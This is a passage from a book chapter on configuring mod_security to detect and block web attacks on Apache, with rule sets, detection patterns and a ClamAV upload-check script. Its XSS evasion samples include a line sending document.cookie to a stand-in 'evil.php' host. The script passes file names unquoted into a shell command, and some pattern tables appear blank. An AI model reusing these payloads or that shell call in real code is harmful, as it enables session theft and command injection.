When mod_security is not active, Apache only sees the first part of the request: the request line (the first line of the request) and the subsequent headers. This is enough for Apache to do its work. When request processing begins, the module that does the processing feeds the request body to where it needs to be consumed. In the case of PHP, for example, the request body goes directly to PHP. Apache almost never sees it. With mod_security enabled, it becomes a requirement to have access to the complete request body before processing begins. That is the only approach that can protect the application. (Early versions of mod_security did look at the body bit by bit, but that proved to be insufficient.) That is why mod_security reads the complete request into its own buffer and later feeds it from there to the processing module. Additional memory space is needed so that the anti-evasion processing can take place. A buffer twice the size of the request body is required by mod_security to complete processing.
In most cases, this is not a problem since request bodies are small. The only case when it can be a problem is when file upload functionality is required. Files can be quite large (sizes of over 100 MB are not unheard of), and mod_security will want to put all of them into memory, twice. If you are running Apache 1, there is no way around this but to disable request body buffering (as described near the end of this chapter) for those parts of the application where file upload takes place. You can also (and probably should) limit the maximum size of the body by using the Apache configuration directive LimitRequestBody. But there is good news for the users of Apache 2. Because of its powerful content filtering API, mod_security for Apache 2 is able to stream the request body to the disk if its size is larger than a predefined value (using the directive SecUploadInMemoryLimit, set to 64 KB by default), so increased memory consumption does not take place. However, mod_security will need to store the complete request to the disk and read it again when it sends it forward for processing.
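To sketch these mitigations (the paths and limits are illustrative; using SecFilterScanPOST in a per-location context is one way to disable body buffering, assuming your version supports it there):

# Cap request bodies at 1 MB (Apache core directive)
LimitRequestBody 1048576
# Apache 1 workaround: skip request body buffering where file
# uploads take place (those bodies then go unfiltered)
<Location /app/upload.php>
    SecFilterScanPOST Off
</Location>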
A similar thing happens when you enable output monitoring (described later in this chapter). Again, the output cannot and will not be delivered to the client until all of it is available to mod_security and after the analysis takes place. This process introduces response buffering. At the moment, there is no way to limit the amount of memory spent doing output buffering, but it can be used in a controlled manner and only enabled for HTML or text files, while disabled for binary files, via output filtering, described later in this chapter.
It is possible to use mod_security in the main server, in virtual hosts, and in per-directory contexts. Practically all configuration directives support this. (The ones that do not, such as SecChrootDir, make no sense outside of the main server configuration.) This allows a different policy to be implemented wherever necessary.
Configuration and rule inheritance is also implemented. Rules added to the main server will be inherited by all virtual hosts, but there is an option to start from scratch (using the SecFiltersInheritance directive). On the same note, you can use mod_security from within .htaccess files (if AllowOverride Options is specified), but be careful not to allow someone you do not trust to have access to this feature.
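For example (the host name and rules are illustrative), a virtual host can discard the inherited rules and define its own policy:

<VirtualHost *:80>
    ServerName app.example.com
    # Start from scratch instead of inheriting main server rules
    SecFiltersInheritance Off
    # Rules specific to this host follow
    SecFilter "\.\./"
</VirtualHost>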
Although mod_security supports the exec action, which allows a custom script to be executed upon detecting an invalid action, Apache offers two mechanisms that allow for tight integration and more flexibility.
One mechanism you should use is ErrorDocument, which allows a script to be executed (among other things) whenever request processing returns with a particular response status code. This feature is frequently used to create a “Page not found” message. Depending on your security policy, the same feature can be used to explain that the security system you put in place believes something funny is going on and, therefore, decided to reject the request. At the same time, you can add code to the script to do something else, for example, to send a notification somewhere. An example script for Apache integration comes with the mod_security distribution.
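Integration can be as simple as the following (the script path is an assumption; a sample script comes with the mod_security distribution):

# Invoke a custom script whenever a request is rejected with
# status 403, the status used by the configuration shown earlier
ErrorDocument 403 /cgi-bin/modsec-message.pl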
The other thing you can do is add mod_unique_id (distributed with Apache and discussed in Chapter 8) into your configuration. After you do, this module will generate a unique ID (guaranteed to be unique within the server) for every request, storing it in the environment variable UNIQUE_ID (where it will be picked up by mod_security). This feature is great for enabling you to quickly find what you are looking for. I frequently use it in the output of an ErrorDocument script, where the unique ID is presented to the user with instructions to cite it as a reference when she complains to the support group. This allows you to quickly and easily pinpoint and solve the problem.
In principle, IDSs support various ways to notify you of the problems they discover. In the best-case scenario, you have some kind of monitoring system to plug the IDS into. If you do not, you will probably end up devising some way to send notifications to your email, which is a bad way to handle notifications. Everyone’s natural reaction to endless email messages from an IDS is to start ignoring them or to filter them automatically into a separate mail folder.
A better approach (see Chapter 8) is to channel IDS alerts into the error log and to implement daily reporting at one location for everything that happens with the web server. That way, when you come to work in the morning, you only have one email message to examine. You may decide to keep email notifications for some dangerous attacks—e.g., SQL injections.
Deploying a web firewall for a known system requires planning and careful execution. It consists of the following steps:
Learn about what you are protecting.
Decide whether an IDS is the correct choice.
Choose the IDS tool you want to deploy. This step is usually done in parallel with the next step since not all tools support all features.
Establish security policy. That is, decide what should be allowed and how you are going to respond to violations.
Install and configure the IDS tool (on a development server).
Deploy in detection mode. That is, just log violations and do not reject requests.
Monitor the implementation, react to alerts, and refine configuration to reduce false positives.
Optionally, upgrade some or all rules to the prevention mode, whereby requests that match some or all of the rules are rejected.
Probably the best advice I can give is for you to learn about the system you want to protect. I am asked all the time to provide an example of a tight mod_security configuration, but I hesitate and almost never do. Intrusion detection (like many other security techniques) is not a simple, fire-and-forget solution, in spite of what some commercial vendors say. Incorrect rules, when deployed, will result in false positives that waste analysts' time. When used in prevention mode, false positives result in reduced system availability, which translates to lost revenue (or increased operations expenses, depending on the way you look at it).
In step 2, you need to decide whether intrusion detection can bring a noticeable increase in security. This is not the same as what I previously discussed in this chapter, that is, whether intrusion detection is a valid tool at all. Here, the effort of introducing intrusion detection needs to be weighed against other ways to solve the problem. First, understand the time commitment intrusion detection requires. If you cannot afford to follow up on all alerts produced by the system and to work continuously to tweak and improve the configuration, then you might as well give up now. The other thing to consider is the nature and the size of the system you want to protect. For smaller applications for which you have the source code, invest in a code review and fix the problems in the source code.
Establishing a protection policy is arguably the most difficult part of the work. You start with the list of weaknesses you want to protect and, having in mind the capabilities of the protection software, work out a feasible protection plan. If it turns out the tool is not capable enough, you may look for a better tool. Work on the policy is similar to the process of threat modeling discussed in Chapter 1.
Installation and configuration is the easy part and already covered in detail here. You need to work within the constraints of your selected tool to implement the previously designed policy. The key to performing this step is to work on a development server first and to test the configuration thoroughly to ensure the protection rules behave as you would expect them to. In the mod_security distribution is a tool (run_test.pl) that can be used for automated tests. As a low-level tool, run_test.pl takes a previously created HTTP request from a text file, sends it to the server, and examines the status code of the response to determine the operation's success. Run regression tests periodically to test your IDS.
Deploying in detection mode only is what you do to test the configuration in real life in an effort to avoid causing disturbance to normal system operation. For several weeks, the IDS should only send notifications without interrupting the requests. The configuration should then be fine-tuned to reduce the false positives rate, hopefully to zero. Once you are confident the protection is well designed (do not hurry), the system operation mode can be changed to prevention mode. I prefer to use the prevention mode only for problems I know I have. In all other cases, run in the detection mode at least for some time and see if you really have the problems you think you may have.
Using only detection capabilities of the intrusion detection software is fine, provided someone will examine the alerts on a regular basis. Rejecting certain hacking attempts straight away may force the attacker to seek other evasion methods, which may be successful (that is where the attackers have the advantage). Letting them through allows you to record their attacks and subsequently close the hole.
There is a set of rules I normally use as a starting point in addition to the basic configuration given earlier. These rules are not meant to protect from direct attacks but rather to enforce strict HTTP protocol usage and make it more difficult for attackers to make manual attacks. As I warned, these rules may not be suitable for all situations. If you are running a public web site, there will be all sorts of visitors, including search engines, which can be a little eccentric in the way they send otherwise normal HTTP requests. Tight configurations usually work better in closed environments.
# Accept only valid protocol versions, helps
# fight HTTP fingerprinting.
SecFilterSelective SERVER_PROTOCOL !^HTTP/(0\.9|1\.0|1\.1)$
# Allow supported request methods only.
SecFilterSelective REQUEST_METHOD !^(GET|HEAD|POST)$
# Require the Host header field to be present.
SecFilterSelective HTTP_Host ^$
# Require explicit and known content encodings for methods
# other than GET or HEAD. The multipart/form-data encoding
# should not be allowed at all if the application does not
# make use of file upload. There are many automated attacks
# out there that are using wrong encoding names.
SecFilterSelective REQUEST_METHOD !^(GET|HEAD)$ chain
SecFilterSelective HTTP_Content-Type \
!(^application/x-www-form-urlencoded$|^multipart/form-data;)
# Require Content-Length to be provided with
# every POST request. Length is a requirement for
# request body filtering to work.
SecFilterSelective REQUEST_METHOD ^POST$ chain
SecFilterSelective HTTP_Content-Length ^$
# Don't accept transfer encodings we know we don't handle
# (you probably don't need them anyway).
SecFilterSelective HTTP_Transfer-Encoding !^$
You may also choose to add some of the following rules to warn you of requests that do not seem to be from common browsers. Rules such as these are suited for applications where the only interaction is expected to come from users using browsers. On a public web site, where many different types of user agents are active, they result in too many warnings.
# Most requests performed manually (e.g., using telnet or nc)
# will lack one of the following headers.
# (Accept-Encoding and Accept-Language are also good
# candidates for monitoring since popular browsers
# always use them.)
SecFilterSelective HTTP_User-Agent|HTTP_Connection|HTTP_Accept ^$ log,pass
# Catch common nonbrowser user agents.
SecFilterSelective HTTP_User-Agent \
(libwhisker|paros|wget|libwww|perl|curl) log,pass
Ironically, your own monitoring tools are likely to generate error log warnings. If you have a dedicated IP address from which you perform monitoring, you can add a rule to skip the warning checks for all requests coming from it. Put the following rule just above the rules that produce warnings:
# Allow requests coming from 192.168.254.125
SecFilterSelective REMOTE_ADDR ^192\.168\.254\.125$ allow
Though you could place this rule at the top of the rule set, that would be a bad idea; as one of the basic security principles says, establish only minimal trust.
Web IDSs are good at enforcing strict protocol usage and defending against known application problems. Attempts to exploit common web application vulnerabilities often have a recognizable footprint. Pattern matching can detect some attacks, but it is generally impossible to catch all of them without generating too many false positives. Because of this, my advice is to use detection only (not rejection) when dealing with common web application attacks. There is another reason to adopt this approach: since no defense against a determined attacker is foolproof, a tight protection scheme will force such an attacker to adopt evasion methods you have not prepared for. If that happens, the attacker becomes invisible to you. Let some attacks through so you are aware of what is happening.
The biggest obstacle to reliable detection is that many web applications allow users to enter free-form text. Consequently, content management systems are the most difficult to defend. (Users may even be discussing web application security in a forum!) When users are allowed to enter arbitrary text, they will sooner or later enter something that looks like an attack.
In this section, I will discuss potentially useful regular expression patterns without going into details as to how they are added to the mod_security configuration, since the method of adding patterns to rules has already been described. (If you are not familiar with common web application attacks, reread Chapter 10.) In addition to the patterns provided here, you can seek inspiration in rules others have created for nonweb IDSs. (For example, rules for Snort, a popular NIDS, can be found at http://www.snort.org and http://www.bleedingsnort.com.)
Database attacks are executed by sneaking an SQL query or a part of it into request parameters. Attack detection must, therefore, attempt to detect commonly used SQL keywords and metacharacters. Table 12-4 shows a set of patterns that can be used to detect database attacks.
Table 12-4. Patterns to detect SQL injection attacks

| Pattern | Query example |
|---|---|
| … | Appends to an existing query |
| … | Attempt to modify the original query to always be true |
| ' | Attempt to escape out of a string and inject a query, and then comment out the rest of the original query |
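Deployed as mod_security rules, patterns of this kind might look as follows. The keyword list is a starting sketch, not an exhaustive or authoritative set, and it will need tuning to your application:

# Watch (but do not block) requests containing
# common SQL keywords; tune to reduce false positives
SecFilterSelective ARGS "union.+select" log,pass
SecFilterSelective ARGS "select.+from" log,pass
SecFilterSelective ARGS "insert[[:space:]]+into" log,pass
SecFilterSelective ARGS "delete[[:space:]]+from" log,pass
SecFilterSelective ARGS "drop[[:space:]]+table" log,pass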
SQL injection attacks are a matter of trial and error. It is almost impossible to execute a successful attack on the first try. It is more likely that the attacker will make errors as he learns about the database layout and table contents. Each error will cause an SQL query somewhere to fail, in turn causing the script to fail, too. Watching for failed queries in the application log will make SQL injection attack detection a reality. If the application was not designed to log such problems, it may still be possible to use output buffering to detect them (using patterns to look for error messages) and log them into the web server error log.
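If you are running the Apache 2 version of mod_security (output filtering is described later in this chapter), a sketch of such detection might look like this. The error strings shown are common examples only and will differ from one database and driver to another:

# Watch response bodies for typical database error messages
SecFilterScanOutput On
SecFilterSelective OUTPUT "You have an error in your SQL syntax" log,pass
SecFilterSelective OUTPUT "supplied argument is not a valid MySQL" log,pass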
So far, I have presented generic SQL patterns. Most databases have proprietary extensions of one kind or another, which rely on keywords that are often easier to detect. These patterns differ from one database to another, so creating a good set of detection rules requires expertise in the deployed database. Table 12-5 shows some interesting patterns for MSSQL and MySQL.
Table 12-5. Database-specific detection patterns

| Pattern | Attack |
|---|---|
| xp_ | MSSQL. Attempt to execute an extended stored procedure (for example, xp_cmdshell) |
| sp_ | MSSQL. Attempt to execute a stored procedure |
| @@ | MSSQL. Access to an internal variable (for example, @@version) |
| into[[:space:]]+outfile | MySQL. Attempt to write the contents of a table to disk |
| load_file | MySQL. Attempt to load a file from disk |
Cross-site scripting (XSS) attacks can be difficult to detect when launched by those who know how to evade detection systems. If the entry point is in the HTML, the attacker must find a way to change from HTML and into something more dangerous. Danger comes from JavaScript, ActiveX components, Flash programs, or other embedded objects. The following list of problematic HTML tags is by no means exhaustive, but it will prove the point:
<object>...</object>
Executes component when page is loaded (IE only)
<embed>...</embed>
Executes component when page is loaded
<applet>...</applet>
Executes applet when page is loaded
<script>...</script>
Executes code when page is loaded
<script src="..."></script>
Executes code when page is loaded
<iframe src="...">
Executes code when page is loaded
<img src="javascript:...">
Executes code when page is loaded
<b onMouseOver="...">
Executes code when mouse pointer covers the bold text
&{...};
Executes code when page is loaded (Netscape only)
Your best bet is to try to detect any HTML in the parameters, as well as the special JavaScript entity syntax that works only in Netscape. If a generic pattern such as <.+> catches too much for your purposes, you may want to list all possible tag names and detect those instead. But if the attacker can sneak a tag in, detection becomes increasingly difficult because of the many evasion techniques that can be used. The following two evasion examples show how easy it is to obfuscate a string and make detection practically impossible:
<img src="javascript:...">
<img src="javasXcript:...">

(X is any of the whitespace characters except space.)
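If you do opt for the broad approach, the corresponding warning rules can be as simple as the following sketch:

# Warn about anything that looks like an HTML tag
SecFilterSelective ARGS "<.+>" log,pass
# Warn about the Netscape-only JavaScript entity syntax
SecFilterSelective ARGS "&\{.+\};" log,pass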
If the attacker can inject content directly into JavaScript, the list of evasion options is even longer. For example, he can use the eval() function to execute an arbitrary string, or the document.write() function to output HTML into the document:
document.write('<img src="http://www.example.com/evil.php?' + document.cookie + '">')
eval('alert(document.cookie)')
eval('al' + 'ert' + '(docu' + 'ment' + '.' + 'co' + 'ok' + 'ie)')
eval('\x61\x6C\x65\x72\x74\x28\x64\x6F\x63\x75\x6D\x65' + '\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29')
Now you understand why you should not stop attackers too early. Knowing you are being attacked, even successfully attacked, is sometimes better than not knowing at all. A useful list of warning patterns for XSS attacks is given in Table 12-6. (I call them warning patterns because you probably do not want to reject requests containing them automatically.) They are not foolproof, but they cast a wide net to catch potential abuse. You may have to refine them over time to reduce false positives for your particular application.
Table 12-6. XSS attack warning patterns
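In rule form, warning patterns of the kind the table describes can look like the following sketch, drawn from the tags and functions discussed above; the list is illustrative and should be tuned to your application:

# XSS warning patterns; log but do not block
SecFilterSelective ARGS "<[[:space:]]*script" log,pass
SecFilterSelective ARGS "javascript:" log,pass
SecFilterSelective ARGS "onmouseover" log,pass
SecFilterSelective ARGS "document\.cookie" log,pass
SecFilterSelective ARGS "eval[[:space:]]*\(" log,pass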
Detecting command execution and file disclosure attacks in the input data can be difficult. The commands are often very short and can appear as normal words in many request parameters. The recommended course of action is to implement a set of patterns to detect but not reject requests. Table 12-7 shows patterns that can be of use. (I have combined many patterns into one to save space.) The patterns in the table are too broad and should never be used to reject requests automatically.
Table 12-7. Command execution and file disclosure detection patterns

| Pattern | Description |
|---|---|
| … | Common Unix commands |
| … | Fragments of common Unix system paths |
| \.\./ | Directory backreference commonly used as part of file disclosure attacks |
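As an illustration of the kind of rules the table describes (the path fragments shown are examples only, not a vetted list):

# Fragments of common Unix system paths
SecFilterSelective ARGS "/bin/|/etc/|/usr/" log,pass
# /etc/passwd is a favorite target of file disclosure attacks
SecFilterSelective ARGS "/etc/passwd" log,pass
# Directory backreference used in file disclosure attacks
SecFilterSelective ARGS "\.\./" log,pass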
Command execution and file disclosure attacks are often easier to detect in the output. On my system, the first line of /etc/passwd contains "root:x:0:0:root:/root:/bin/bash", and this is the file any attacker is likely to examine. A pattern such as root:x:0:0:root is likely to work here. Similarly, the output of the id command looks like this:

uid=506(ivanr) gid=506(ivanr) groups=506(ivanr)

A pattern such as uid=[[:digit:]]+\([[:alnum:]]+\) gid=[[:digit:]]+\([[:alnum:]]+\) will catch its use by looking at the output.
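Put into practice (Apache 2 version only, since response bodies must be scanned), the two patterns might be deployed like this:

SecFilterScanOutput On
# First line of /etc/passwd appearing in output
SecFilterSelective OUTPUT "root:x:0:0:root"
# Output of the id command appearing in output
SecFilterSelective OUTPUT "uid=[[:digit:]]+\([[:alnum:]]+\) gid=[[:digit:]]+\([[:alnum:]]+\)"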
I conclude this chapter with a few advanced topics. These topics are regularly the subject of email messages I get about mod_security on the users' mailing list.
The mod_security configuration data can be placed into any Apache context. This means you can configure it in the main server, virtual hosts, directories, locations, and file matches. It even works in the .htaccess file context. Whenever a subcontext is created, it automatically inherits the configuration and all the rules from the parent context. Suppose you have the following:
SecFilterSelective ARG_p KEYWORD

<Location /moresecure/>
SecFilterSelective ARG_q KEYWORD
</Location>
Requests for the parent configuration will have only parameter p tested, while requests that fall in the /moresecure/ location will have p and q tested (in that order). This makes it easy to add more protection. If you need less protection, you can choose not to inherit any of the rules from the parent context. You do this with the SecFilterInheritance directive. For example, suppose you have:
SecFilterSelective ARG_p KEYWORD

<Location /moresecure/>
SecFilterInheritance Off
SecFilterSelective ARG_q KEYWORD
</Location>
Requests for the parent configuration will have only parameter p tested, while requests that fall in the /moresecure/ location will have only parameter q tested. The SecFilterInheritance directive affects only rule inheritance. The rest of the configuration is still inherited, but you can use the configuration directives to change it at will.
Byte-range restriction is a special type of protection that reduces the range of byte values allowed in request parameters. Such protection can be effective against buffer overflow attacks on vulnerable binaries. The built-in protection, if used, validates that every variable used in a rule conforms to the range specified with the SecFilterForceByteRange directive. Applications built for an English-speaking audience will probably use only a part of the ASCII set. Restricting all bytes to values from 32 to 126 will not prevent normal functionality:
SecFilterForceByteRange 32 126
However, many applications need to allow the 0x0a and 0x0d bytes (line feed and carriage return, respectively) because these characters are used in free-form fields (ones entered via a <textarea> tag). Though you can relax the range slightly to allow byte values from 10 on up, I am often asked whether it is possible to have more than one range. The SecFilterForceByteRange directive does not yet support that, but you can perform such a check with a rule that sits at the beginning of the rule set:
SecFilterSelective ARGS !^[\x0a\x0d\x20-\x7e]*$
The previous rule allows the characters 0x0a and 0x0d, plus the range from 0x20 (32) to 0x7e (126).
Since mod_security understands the multipart/form-data encoding used for file uploads, it can extract the uploaded files from the request and store them for future reference. In a way, this is a form of audit logging (see Chapter 8). mod_security offers another exciting feature: validation of uploaded files in real time. All you need is a script designed to take the full path to the file as its first and only parameter, and to enable the file validation functionality in mod_security:
SecUploadApproveScript /usr/local/apache/bin/upload_verify.pl
The script will be invoked for every file upload attempt. If the script returns 1 as the first character of the first line of its output, the file will be accepted. If it returns anything else, the whole request will be rejected. It is useful to have the error message (if any) on the same line after the first character, as it will be printed in the mod_security log. File upload validation can be used for several purposes:
To inspect uploaded files for viruses or other types of attack
To allow only files of certain types (e.g., images)
To inspect and validate file content
If you have the excellent open source antivirus program Clam AntiVirus (http://www.clamav.net) installed, you can use the following utility script as an interface:
#!/usr/bin/perl

$CLAMSCAN = "/usr/bin/clamscan";

if (@ARGV != 1) {
    print "Usage: modsec-clamscan.pl <filename>\n";
    exit;
}

my ($FILE) = @ARGV;

# Run clamscan against the file and capture the first
# line of its output
$cmd = "$CLAMSCAN --stdout --disable-summary $FILE";
$input = `$cmd`;
$input =~ m/^(.+)/;
$error_message = $1;

$output = "0 Unable to parse clamscan output";

# Map the clamscan result to the response mod_security
# expects: "1 ..." accepts the file, "0 ..." rejects it
if ($error_message =~ m/: Empty file\.$/) {
    $output = "1 empty file";
}
elsif ($error_message =~ m/: (.+) ERROR$/) {
    $output = "0 clamscan: $1";
}
elsif ($error_message =~ m/: (.+) FOUND$/) {
    $output = "0 clamscan: $1";
}
elsif ($error_message =~ m/: OK$/) {
    $output = "1 clamscan: OK";
}

print "$output\n";
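Assuming you save the script as /usr/local/apache/bin/modsec-clamscan.pl (the path is an example), you would point mod_security at it in the same way as before:

SecUploadApproveScript /usr/local/apache/bin/modsec-clamscan.pl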
When mod_security operates from within Apache (as opposed to working as a network gateway), it can obtain more information about requests. One useful bit of information is the choice of a module to handle the request (called a handler). In the early phases of request processing, Apache looks for candidate modules to handle the request, usually by looking at the extension of the targeted file. If a handler is not found, the request is probably for a static file (e.g., an image). Otherwise, the handler will probably process the file in some way (for example, executing the script in the case of PHP) and dynamically create a response. Since mod_security mostly serves the purpose of protecting dynamic resources, this information can be used for optimization. If you configure the SecFilterEngine directive with the DynamicOnly parameter, mod_security will act only on those requests that have a handler attached to them:
# Only process dynamic requests
SecFilterEngine DynamicOnly
Unfortunately, it is possible to configure Apache to serve dynamic content with the handler undefined, by misusing its AddType directive. Even the official PHP installation guide recommends this approach. If that happens, mod_security will not be able to determine which requests are truly dynamic and will not be able to protect them. The correct approach is to use the AddHandler directive, as in this example for PHP:
AddHandler application/x-httpd-php .php
Relying on the existence of a request handler to decide whether to protect a resource can be rewarding, but since it can be dangerous if handlers are not configured correctly, check whether relying on handlers really works in your case. You can do this by having a rule that rejects every request (in which case it will be obvious whether mod_security works) or by looking at what mod_security writes to the debug log (where it will state if it believes the incoming request is for a static resource).
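For the first test, a temporary catch-all rule along the following lines will do; remove it once you have confirmed the engine is processing the requests you expect it to process:

# Temporarily reject every request; if a request gets
# through, mod_security did not process it
SecFilterSelective REQUEST_URI .* deny,status:403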
There are two ways to control request body buffering and monitoring. You have seen one in the default configuration, where the SecFilterScanPOST directive was used. This works if you know in advance where you do and do not want buffering to take place. Using the Apache context directives, you can turn off buffering for some parts of the site, as in the following example:
# Turn off POST buffering for
# scripts in this location
<Location /nobuffering/>
SecFilterScanPOST Off
</Location>
Sometimes you need to disable buffering on a per-request basis, based on some request attribute. This is possible. If mod_security detects that the MODSEC_NOPOSTBUFFERING environment variable is defined, it will not read in the request body. The environment variable can be defined with the help of the mod_setenvif module and its SetEnvIf directive:
# Disable request body buffering for all file uploads
SetEnvIfNoCase Content-Type ^multipart/form-data \
"MODSEC_NOPOSTBUFFERING=Do not buffer file uploads"
The text you assign to the variable will appear in the debug log, making it clear why the request body was not buffered. Be aware that turning off buffering like this can remove protection from your scripts. If the attacker finds out how to disable request body buffering, he may be able to do so for every script and then use the POST method for all attacks.
Response body monitoring is supported in the Apache 2 version of mod_security and can prevent information leaks or detect signs of intrusion. This type of filtering needs to be enabled first, because it is off by default:
# Enable output filtering
SecFilterScanOutput On

# Restrict output filtering to text-based pages
SecFilterOutputMimeTypes "(null) text/plain text/html"
It is important to restrict filtering by MIME type to prevent binary resources, such as images, from being buffered and analyzed. The SecFilterSelective directive is used against the OUTPUT variable to monitor response bodies. The following example watches pages for PHP errors:
SecFilterSelective OUTPUT "Fatal Error:"
Using a trick conceived by Ryan C. Barnett (some of whose work is available at https://sourceforge.net/users/rcbarnett/), output monitoring can be used as a form of integrity monitoring to detect and protect against defacement attacks. Attackers performing defacement usually replace the complete home page with their own content. To fight this, Ryan embeds a unique keyword into every page and creates an output filtering rule that only allows a page to be sent if it contains the keyword:
SecFilterSelective OUTPUT !KEYWORD
This is not recommended for most applications due to its organizational overhead and potential for errors, but it can work well in a few high-profile cases.
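As a concrete sketch, assuming every generated page embeds a token such as <!-- integrity-token --> in its template (the token name here is made up):

# Refuse to serve pages that lack the integrity token
SecFilterScanOutput On
SecFilterSelective OUTPUT !integrity-token deny,status:503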
Though most of this chapter has used negative security model protection in its examples, you can also deploy mod_security in a positive security model configuration. A positive security model relies on identifying requests that are safe, instead of looking for dangerous content. In the following example, I demonstrate this approach by showing the configuration for two application scripts. For each script, the standard Apache container directive <Location> is used to enclose the mod_security rules that apply only to that script. The use of the SecFilterSelective directive to specify rules has been described previously.
<Location /user_view.php>
# This script only accepts GET
SecFilterSelective REQUEST_METHOD !^GET$
# Accept only one parameter: id
SecFilterSelective ARGS_NAMES !^id$
# Parameter id is mandatory, and it must be
# a number, 4-14 digits long
SecFilterSelective ARG_id !^[[:digit:]]{4,14}$
</Location>

<Location /user_add.php>
# This script only accepts POST
SecFilterSelective REQUEST_METHOD !^POST$
# Accept three parameters: firstname, lastname, and email
SecFilterSelective ARGS_NAMES !^(firstname|lastname|email)$
# Parameter firstname is mandatory, and it must
# contain text 1-64 characters long
SecFilterSelective ARG_firstname !^[[:alnum:][:space:]]{1,64}$
# Parameter lastname is mandatory, and it must
# contain text 1-64 characters long
SecFilterSelective ARG_lastname !^[[:alnum:][:space:]]{1,64}$
# Parameter email is optional, but if it is present
# it must consist only of characters that are
# allowed in an email address
SecFilterSelective ARG_email !(^$|^[[:alnum:].@]{1,64}$)
</Location>
There is a small drawback to this configuration approach. To determine which <Location> block applies to a request, Apache has to look through all such directives present. For applications with a small number of scripts, this will not be a problem, but it may present a performance problem for applications with hundreds of scripts, each of which needs its own <Location> block.
A feature to allow user-defined types (predefined regular expressions), such as the one present in mod_parmguard (see the sidebar), would significantly ease the task of writing configuration data.